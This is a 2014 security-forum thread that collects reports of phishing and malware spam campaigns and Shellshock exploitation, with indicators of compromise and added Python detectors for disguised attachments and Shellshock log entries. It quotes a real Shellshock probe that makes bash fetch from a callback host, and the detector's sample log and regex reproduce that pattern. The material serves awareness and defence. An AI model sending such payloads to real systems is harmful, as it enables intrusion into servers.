Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/
- http://threattrack.tumblr.com/post/98321608223/american-express-home-depot-credentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/094c409ba72f53cb124310343c3a213b/tumblr_inline_ncf48aKPiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___
Netcraft Sep 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/09/24/september-2014-web-server-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___
Viator(dot)com - Data Compromise ...
- https://blog.malwarebytes.org/online-security/2014/09/viator-com-data-compromise-are-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.com/about/media-center/press-releases/pr33251
Sep 19, 2014
... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___
Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/
Sep 18, 2014
Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."
- http://arstechnica.com/security/2014/09/google-stops-malicious-advertising-campaign-that-could-have-reached-millions/
Sep 22 2014
:mad: :fear:
AplusWebMaster
2014-09-25, 15:28
FYI...
Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-rbs-bacs-transfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.
RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
From: Riley Crabtree [creditdepart@ rbs .co.uk]
Date: 25 September 2014 10:58
Subject: BACS Transfer : Remittance for JSAG814GBP
We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link ...
Sage Account & Payroll: "Outdated Invoice"
From: Sage Account & Payroll [invoice@ sage .com]
Date: 25 September 2014 10:53
Subject: Outdated Invoice
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...
Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIitE/VCPrdXzlOiI/AAAAAAAAFvA/YGCgcp8GX2s/s1600/sage2.png
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 25 September 2014 11:36
Subject: Important - Commercial Documents
Important account documents
Reference: C400
Case number: 05363392
Please review BACs documents.
Click link below ...
NatWest Invoice: "Important - New account invoice"
From: NatWest Invoice [invoice@ natwest .com]
Date: 25 September 2014 10:28
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here ...
The links in the emails go to different download locations to make it harder to block... In each case the page then directs the victim to download the file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustotal.com/en-gb/file/1397ff56e47b642ff1f4eaaaedc3b84fc5cd7c619b25a894a57dabe62987d84c/analysis/1411638249/
... Behavioural information
- http://threattrack.tumblr.com/post/98386009528/sage-software-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c600697c85ad23d80119101ea06360d0/tumblr_inline_ncglljx1ql1r6pupn.png
Tagged: Sage, Upatre
___
Fake BCA SPAM - PDF malware
- http://myonlinesecurity.co.uk/bca-banking-24-09-14-fake-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Accounts Dept
Halls Holdings Ltd
Tel: 01743 450700
Fax: 01743 443759 ...
25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53*. This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cfd9d4f6fc16e6cf4f5960b5c1b3ad5724f86ec0eefd6e87ab154c4b1e156443/analysis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/outlook-received-voice-mail-fake-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE7838396453.wav (26 KB)
Caller-Id: 7838396453
Message-Id: ID9CME
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c97b0291ac92a49293a1c8e5a9145241d2e09f9b53df8c13c70ca33701090773/analysis/1411657167/
... Behavioural information
___
Fake Gov't e-mail SCAM
- https://www.ic3.gov/media/2014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3... Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states... If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."
:fear::fear: :mad:
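The spoofed-icon lure that recurs in the posts above relies on a double extension (Invoice 77261990001.PDF.exe, 01636605058_20140919_105000.wav.exe, BCA Banking 24.09.14.pdf.exe) or a bare .scr inside a ZIP, which Windows displays as a document when known extensions are hidden. As an added example for this thread (not code from any of the quoted blogs), the Python below triages a ZIP attachment two ways: by that naming pattern, and by the PE "MZ" header in the member's content, so a renamed executable is caught even when its name looks harmless; the extension lists and the sample archive are constructed assumptions.

```python
"""Triage a ZIP email attachment for the double-extension lure seen in the
spam runs above.

Added example, not code from the quoted blogs. Two independent checks:
  1. name-based: the final extension is executable, optionally preceded by a
     decoy document/media extension that hidden-extensions Windows would show;
  2. content-based: the member starts with the DOS 'MZ' signature that every
     Windows PE executable carries, regardless of what the file is called.
The archive built below is constructed test input (a fake MZ stub, not a real
executable); nothing in it is ever executed, only the first two bytes are read.
"""
import io
import os
import zipfile

# Extensions Windows will run on double-click (assumed list, extend as needed).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Extensions used as the "decoy" half of the double extensions in the runs above.
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".wav", ".jpg", ".png", ".txt"}


def split_extensions(name):
    """All dotted suffixes of a path's basename, lowercased, in order.
    'Invoice 77261990001.PDF.exe' -> ['.pdf', '.exe']"""
    base = os.path.basename(name.replace("\\", "/"))
    return ["." + part.lower() for part in base.split(".")[1:]]


def classify_name(name):
    """Reasons a member name is suspicious; an empty list means nothing found."""
    exts = split_extensions(name)
    reasons = []
    if exts and exts[-1] in EXECUTABLE_EXTS:
        reasons.append("executable extension " + exts[-1])
        if any(ext in DECOY_EXTS for ext in exts[:-1]):
            reasons.append("decoy document extension before " + exts[-1])
    return reasons


def looks_like_pe(head):
    """True when the leading bytes carry the 'MZ' DOS header of a PE file."""
    return head[:2] == b"MZ"


def triage_zip(zip_bytes):
    """Map each suspicious member name to the list of reasons it was flagged."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_name(info.filename)
            with zf.open(info) as member:
                if looks_like_pe(member.read(2)):  # header only, never executed
                    reasons.append("PE header (MZ) in content")
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_zip(members):
    """Build an in-memory ZIP from {name: bytes}; used here to construct input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


FAKE_MZ_STUB = b"MZ" + b"\x00" * 62  # constructed stand-in for a PE payload

# Constructed sample: member names taken from the spam runs quoted above, plus a
# renamed executable behind an innocent name and two genuinely harmless files.
SAMPLE_MEMBERS = {
    "Invoice 77261990001.PDF.exe": FAKE_MZ_STUB,
    "01636605058_20140919_105000.wav.exe": FAKE_MZ_STUB,
    "voicemessage.scr": FAKE_MZ_STUB,
    "statement.pdf": FAKE_MZ_STUB,  # only the content check catches this one
    "genuine_report.pdf": b"%PDF-1.4\n%%EOF\n",
    "readme.txt": b"plain text\n",
}


def run_demo():
    """Triage the constructed sample and print one line per flagged member."""
    findings = triage_zip(build_zip(SAMPLE_MEMBERS))
    for name, reasons in sorted(findings.items()):
        print("%-40s %s" % (name, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    run_demo()
```

In a mail gateway the name check alone is cheap enough to run on every attachment, while the header check is what catches the .scr-without-wrapper variant once the ZIP is dropped.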
AplusWebMaster
2014-09-26, 14:58
FYI...
Amazon phish ...
- http://myonlinesecurity.co.uk/amazon-account-confirmation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Amazon-Account-Confirmation.png
Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___
Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.
Employee Documents - Internal Use
From: victimdomain
Date: 26 September 2014 09:41
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...
You have a new voice
From: Voice Mail [Voice.Mail@ victimdomain]
Date: 26 September 2014 09:30
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...
RBS: BACS Transfer : Remittance for JSAG244GBP
From: Douglas Byers [creditdepart@ rbs .co.uk]
Date: 26 September 2014 10:12
Subject: BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...
New Fax
From: FAX Message [fax@victimdomain]
Date: 26 September 2014 10:26
Subject: New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...
... The attack has evolved recently... usually these malicious links were forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find... malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/9819d4027893bcb20cdefc49632008e71672fb3eaefbbb0ef1b626a52dd6c6c4/analysis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-address/184.106.55.51/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
___
Bill.com Spam
- http://threattrack.tumblr.com/post/98466527048/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
Payment Details [Incident: 711935-599632]
Typical e-mail details:
We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
Regards,
Bill.com Payment Operations
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d0ecbce8726c0f09eda8b8e4dbc7c45/tumblr_inline_ncigloYHaW1r6pupn.png
Malicious File Name and MD5:
bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)
Tagged: bill.com, Vawtrak
___
More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-hmrc-taxes-application.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* as this earlier spam run*.
HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From: noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date: 26 September 2014 12:26
Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...
Important - BT Digital File
From: Cory Sylvester [Cory.Sylvester@ bt .com]
Date: 26 September 2014 12:51
Subject: Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...
RBS Bankline: Outstanding invoice
From: Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
To: <REDACTED>
Date: 26 September 2014 13:05
Subject: Outstanding invoice
{_BODY_TXT}
Dear [redacted],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here ...
In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
___
Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-transaction-complete-fake-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Unable to complete your most recent Transaction. Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt ...
26 September 2014: PaymentReceipt262.zip: Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55*. This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5149eb19e642e141818326b4ad670e9b74496881ea1de69c13786f021efda559/analysis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
195.110.124.133: https://www.virustotal.com/en/ip-address/195.110.124.133/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
:mad: :fear::fear:
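The posts above keep describing the same two tricks: a ZIP wrapping a `.pdf.exe` or `_pdf.scr` that carries a document icon, and lately the bare `.scr` sent without the ZIP wrapper. As an added example (not code from any of the quoted blogs), here is a mail-gateway style check that inspects an attachment in memory, reports what Explorer would show with known extensions hidden, and flags executable extensions, document extensions hidden in front of them, and PE headers sitting under a document extension; the archive and its member bodies are constructed stand-ins.

```python
import io
import zipfile
from typing import Dict, List

# Extensions Windows executes as programs, whatever icon the file carries.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta"}
# Document/media extensions the lures on the page imitate (.pdf, .xls, .doc, .wav).
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "jpg", "png", "txt"}


def windows_display_name(filename: str) -> str:
    """Approximate what Explorer shows with 'Hide extensions for known file types'
    on: the final registered extension is dropped, so 'invoice.pdf.exe' is listed
    as 'invoice.pdf'.  Only the two extension sets above count as 'known' here."""
    stem, sep, ext = filename.rpartition(".")
    if sep and ext.lower() in EXECUTABLE_EXTS | DOCUMENT_EXTS:
        return stem
    return filename


def assess_member(name: str, head: bytes) -> Dict[str, object]:
    """Judge one file by its name and its first bytes; returns the reasons it is
    suspicious (an empty list means nothing deceptive was found)."""
    base = name.rsplit("/", 1)[-1]
    parts = base.lower().split(".")
    real_ext = parts[-1] if len(parts) > 1 else ""
    stem = ".".join(parts[:-1]) if len(parts) > 1 else parts[0]
    inner_exts = parts[1:-1]  # extensions sitting in front of the real one
    reasons: List[str] = []
    if real_ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{real_ext}")
        if any(e in DOCUMENT_EXTS for e in inner_exts):
            reasons.append("document extension hidden in front of executable extension")
        if any(stem.endswith(f"_{d}") or stem.endswith(f"-{d}") for d in DOCUMENT_EXTS):
            reasons.append("document type hinted in the name (e.g. '_pdf')")
    elif head[:2] == b"MZ":
        # PE image (DOS 'MZ' stub) wearing a non-executable extension.
        reasons.append("PE header but non-executable extension")
    return {"name": base, "shown_as": windows_display_name(base),
            "suspicious": bool(reasons), "reasons": reasons}


def scan_zip_attachment(data: bytes) -> List[Dict[str, object]]:
    """Assess every file inside a ZIP attachment without extracting it to disk."""
    results = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)  # two bytes suffice for the MZ check
            results.append(assess_member(info.filename, head))
    return results


def scan_attachment(filename: str, data: bytes) -> List[Dict[str, object]]:
    """Handle both shapes seen in the posts: a ZIP wrapper around the executable,
    or the bare .scr/.exe delivered directly once the ZIP wrapper was dropped."""
    if zipfile.is_zipfile(io.BytesIO(data)):
        return scan_zip_attachment(data)
    return [assess_member(filename, data[:2])]


def build_sample_zip() -> bytes:
    """Constructed archive: member names mirror those quoted on the page, the
    bodies are inert stand-ins (a bare MZ stub, a minimal PDF)."""
    fake_pe = b"MZ" + b"\0" * 62
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("PaymentReceipt262.exe", fake_pe)
        zf.writestr("ThemDigital_Invoice_42559029506452623.pdf.exe", fake_pe)
        zf.writestr("document7698124-86421_pdf.scr", fake_pe)
        zf.writestr("statement.pdf", b"%PDF-1.4\n%%EOF\n")  # genuine-looking PDF
        zf.writestr("report.pdf", fake_pe)  # executable renamed to .pdf
    return buf.getvalue()


if __name__ == "__main__":
    for r in scan_attachment("sample.zip", build_sample_zip()):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['name']:50} shown as: {r['shown_as']}")
        for why in r["reasons"]:
            print(f"{'':10}   - {why}")
```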
AplusWebMaster
2014-09-28, 13:32
FYI...
Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil-network-shellshock-and-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova
** http://pastebin.com/2mC1pXaJ
83.166.234.186: https://www.virustotal.com/en/ip-address/83.166.234.186/information/
83.166.234.133: https://www.virustotal.com/en/ip-address/83.166.234.133/information/
___
Shellshock in the Wild
- http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)
- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223
CentOS: http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
Novell SUSE: http://support.novell.com/security/cve/CVE-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."
:fear::fear: :mad:
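The probe quoted in the dynamoo post above rides in the User-Agent header, so it ends up in the web server's access log. As an added example (not code from any of the quoted blogs), here is a scanner that parses Apache combined-format log lines, flags the `() { ...};` function-definition prefix in the request, referer or user-agent field, and pulls out the callback URL the probe tries to fetch so it can be blocked; the log lines, IPs (192.0.2.0/24) and host names (example.invalid) are constructed.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" format, optionally prefixed by a vhost:port token as in the
# quoted log line.  Quoted fields may contain backslash-escaped quotes.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?:\S+ )?(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<agent>' + _QUOTED + r')"'
)

# The exported-function prefix that vulnerable bash mis-parsed: "() {", a body,
# "}" and then ";" with a trailing command.  Whitespace is optional in every gap.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

# Any URL inside the trailing command: the host the probe calls back to.
URL_RE = re.compile(r'https?://[^\s"\\]+')


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if malformed."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_shellshock(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line whose request, referer or user-agent carries
    the Shellshock prefix, with the attacker-controlled URLs it tries to fetch."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # truncated or non-combined line: skip, do not crash
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append({
                    "host": rec["host"],
                    "time": rec["time"],
                    "field": field,
                    "callbacks": URL_RE.findall(rec[field]),
                })
                break  # one finding per line is enough for a blocking decision
    return findings


# Constructed sample log (not real traffic); the first line copies the shape of
# the probe quoted above, vhost prefix and escaped quotes included.
SAMPLE_LOG = [
    'www.example.invalid:80 192.0.2.10 - - [27/Sep/2014:03:08:37 +0100] '
    '"GET / HTTP/1.0" 200 11044 "-" '
    '"() { :;}; /bin/bash -c \\"wget -q -O /dev/null http://c2.example.invalid/test/\\""',
    # Ordinary browser visit.
    '192.0.2.20 - - [27/Sep/2014:03:09:01 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"',
    # Same probe carried in the Referer header instead.
    '192.0.2.30 - - [27/Sep/2014:03:10:15 +0100] "GET /cgi-bin/status HTTP/1.1" 404 209 '
    '"() { :; }; /usr/bin/curl -s http://c2.example.invalid/x" "curl/7.37.0"',
    # Truncated line: must be skipped, not crash the scanner.
    '192.0.2.40 - - [27/Sep/2014:03:11:00 +0100] "GET / HTTP/1.0',
]


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['time']}  {hit['host']:15}  via {hit['field']:8}  "
              f"callbacks: {', '.join(hit['callbacks']) or '-'}")
```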
AplusWebMaster
2014-09-29, 18:40
FYI...
Fake SITA SPAM - PDF malware
- http://myonlinesecurity.co.uk/sita-uk-remittance-advice-fake-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in the statement.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...
Update: a slightly revised email coming out now but still the -same- malware attachment
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in statement.
Any queries please contact us on 01934-524004.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...
29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55*. This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d8a6c8626cab8f4588254ce0d48460e9968ede774cc7c5b2b756ce4055e39d1d/analysis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-complete-office-solutions-fake-xls-malware/
